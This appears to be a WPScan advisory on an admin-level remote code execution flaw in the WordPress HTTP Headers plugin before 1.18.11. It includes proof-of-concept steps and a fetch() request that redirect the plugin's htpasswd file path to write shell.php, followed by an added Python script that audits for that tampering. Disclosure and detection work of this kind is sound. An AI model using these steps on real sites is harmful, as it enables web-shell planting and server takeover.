wpvulndb
Qerogram (at Kakao Style Corp.)
WPVDB-ID: E0CC6740-866A-4A81-A93D-FF486B79B7F7
Jun 19, 2023 - 12:00 a.m.

HTTP Headers < 1.18.11 - Admin+ Remote Code Execution

Source: wpscan.com
Tags: http headers, remote code execution, wordpress, security, vulnerability

EPSS: 0.002 (Low), percentile 57.4%

This plugin allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.

PoC

--- <= 1.18.10 PoC ---

1. As an admin, visit http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&tab=advanced, and paste the following in your browser’s prompt:

    await fetch("/wp-admin/options.php", {
        "credentials": "include",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded",
        },
        "body": `option_page=http-headers-mtd&action=update&_wpnonce=${jQuery('#_wpnonce').attr('value')}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dhttp-headers%26tab%3Dadvanced&hh_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess&hh_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini&hh_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php&hh_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh_method=htaccess`,
        "method": "POST",
        "mode": "cors"
    });

2. Navigate to http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&header=www-authenticate
3. Ensure WWW-Authenticate is enabled, and fill the form with Username “” and Password as any value.
4. Navigate to Settings > HTTP Headers > Advanced settings and set the “Location of .hh-htpasswd” field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
5. Go to /shell.php and see the RCE text.

--- Pre-1.18.8 PoC ---

1. As an admin user within WP Admin, navigate to Settings > HTTP Headers > Advanced settings.
2. Change the “Location of .hh-htpasswd” field: update the file name to “shell.php” (e.g. /var/www/html/shell.php)
3. Navigate to Settings > HTTP Headers > Authentication. Click “Edit” to the right of “WWW-Authenticate”.
4. Ensure WWW-Authenticate is enabled, and fill the form with Username “” and Password as any value.
5. Navigate to Settings > HTTP Headers > Advanced settings and set the “Location of .hh-htpasswd” field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
6. Go to /shell.php and see the RCE text.
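A defensive audit for the path settings used in the PoC above, as an added example that is not part of the original advisory or the plugin's code. It flags any of the four settings whose file name is not the one the setting is meant for, in stored option values or in a captured POST body to /wp-admin/options.php. Assumptions: the expected file names are taken from the PoC values and field label on this page, stored options use the same names as the form fields, and the function names and sample body are constructed.

```python
import posixpath
from urllib.parse import parse_qs

# Setting name -> file name it is meant to point at. Assumption: names are
# taken from the PoC values and the ".hh-htpasswd" field label on this page.
EXPECTED_NAMES = {
    "hh_htaccess_path": ".htaccess",
    "hh_user_ini_path": ".user.ini",
    "hh_htpasswd_path": ".hh-htpasswd",
    "hh_htdigest_path": ".hh-htdigest",
}


def audit_paths(options):
    """Return (setting, value, expected_name) for each path setting whose
    file name differs from the expected one."""
    findings = []
    for setting, expected in EXPECTED_NAMES.items():
        value = options.get(setting)
        if not value:
            continue  # setting absent or empty: nothing to compare
        normalized = posixpath.normpath(value.replace("\\", "/"))
        if posixpath.basename(normalized) != expected:
            findings.append((setting, value, expected))
    return findings


def audit_post_body(body):
    """Audit a captured urlencoded body posted to /wp-admin/options.php."""
    fields = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if fields.get("option_page") != "http-headers-mtd":
        return []  # not this plugin's advanced-settings form
    return audit_paths(fields)


# Constructed sample: the PoC body from this page with a placeholder nonce.
SAMPLE_BODY = (
    "option_page=http-headers-mtd&action=update&_wpnonce=PLACEHOLDER"
    "&hh_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess"
    "&hh_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini"
    "&hh_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php"
    "&hh_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh_method=htaccess"
)

if __name__ == "__main__":
    for setting, value, expected in audit_post_body(SAMPLE_BODY):
        print(f"{setting}: {value!r} does not end in {expected!r}")
```

audit_paths can also be fed a dict of the stored option values exported from the site, so the same check covers settings already saved as well as requests in flight.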

CPE
Name: http-headers
Operator: lt
Version: 1.18.11
